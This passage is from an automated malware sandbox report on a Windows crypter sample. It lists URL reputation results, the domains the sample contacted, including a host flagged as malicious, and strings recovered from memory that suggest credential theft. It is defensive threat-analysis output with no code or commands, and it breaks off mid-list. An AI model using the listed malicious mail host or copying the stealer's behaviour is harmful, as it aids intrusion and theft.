              http://www.ascendercorp.com/typedesigners.html/0%Avira URL Cloudsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.urwpp.de0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.fontbureau.coms-P0%Avira URL Cloudsafe
              http://www.founder.com.cn/cn/d0%Avira URL Cloudsafe
              http://www.fontbureau.comrsiv_-l0%Avira URL Cloudsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.fontbureau.com.TTF0%URL Reputationsafe
              http://www.fontbureau.comml-Y0%Avira URL Cloudsafe
              http://www.fontbureau.comasF;-0%Avira URL Cloudsafe
              http://www.carterandcone.com%(0%Avira URL Cloudsafe
              http://www.fontbureau.comalsd0%URL Reputationsafe
              http://www.galapagosdesign.com/0%URL Reputationsafe
              http://www.fontbureau.comF0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/P0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
              http://www.fontbureau.comd0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.urwpp.deeg0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.fontbureau.comoitu0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/t0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.zhongyicts.com.cno.0%URL Reputationsafe
              http://www.fontbureau.comE.TTF0%URL Reputationsafe
              http://mail.strictfacilityservices.com0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/H-u0%Avira URL Cloudsafe
              http://www.fontbureau.comd&-c0%Avira URL Cloudsafe
              http://www.fontbureau.comcomt0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/;-0%Avira URL Cloudsafe
              http://www.fontbureau.comdf0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/&-c0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/_-l0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/jp/--0%Avira URL Cloudsafe
              https://OPBeIPZ8XbJqLOvY6X.net0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              api.ipify.org.herokudns.com
              		52.20.78.240
              		truefalse
                		unknown
                strictfacilityservices.com
                		111.118.212.38
                		truetrue
                  		unknown
                  api.ipify.org
                  		unknown
                  		unknownfalse
                    		high
                    mail.strictfacilityservices.com
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://api.ipify.org/false
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://www.fontbureau.com/designersGSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/?SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://UrUbMY.comnrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.founder.com.cn/cn/bTheSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers?SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.jiyu-kobo.co.jp/s-PSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.comdH-uSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/jp/&-cSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://strictfacilityservices.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.538758099.0000000002F8D000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539377168.0000000002B6E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.tiro.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/Y001SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://api.ipify.orgmail.strictfacilityservices.comaccountsnrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designersSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272447141.0000000005A47000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271875759.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.galapagosdesign.com/staff/dennis.htm/SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.274751062.0000000005A43000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.goodfont.co.krSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.carterandcone.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.266402265.0000000005A4C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268520007.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268302757.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269366094.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htm2SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.274751062.0000000005A43000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/--SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sajatypeworks.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.typography.netDSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cn/cTheSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://api.ipify.orgSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://fontfabrik.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.comgritaSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271209683.0000000005A51000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271153816.0000000005A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.coms-PSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.316302127.0000000005A40000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.ascendercorp.com/typedesigners.html/SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268958128.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268838022.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.comd--SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://www.fontbureau.comB.TTFSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cn/dSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.265019576.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.264911934.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.264791589.0000000005A50000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.comrsiv_-lSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://DynDns.comDynDNSnamejidpasswordPsi/PsinrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/DPleaseSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.comasF;-SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://www.fontbureau.comml-YSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.316302127.0000000005A40000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fonts.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.sandoll.co.krSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.carterandcone.com%(SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.266402265.0000000005A4C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270013809.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268520007.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270302429.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268302757.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270410317.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270179920.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269843779.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269945334.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270233958.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    http://www.urwpp.deDPleaseSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.urwpp.deSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273210069.0000000005A48000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270890643.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273089223.0000000005A48000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273295422.0000000005A48000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.zhongyicts.com.cnSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.318278212.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.sakkal.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com.TTFSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.comalsdSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/H-uSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269366094.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.apache.org/licenses/LICENSE-2.0SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.galapagosdesign.com/SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.274806173.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.comFSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, 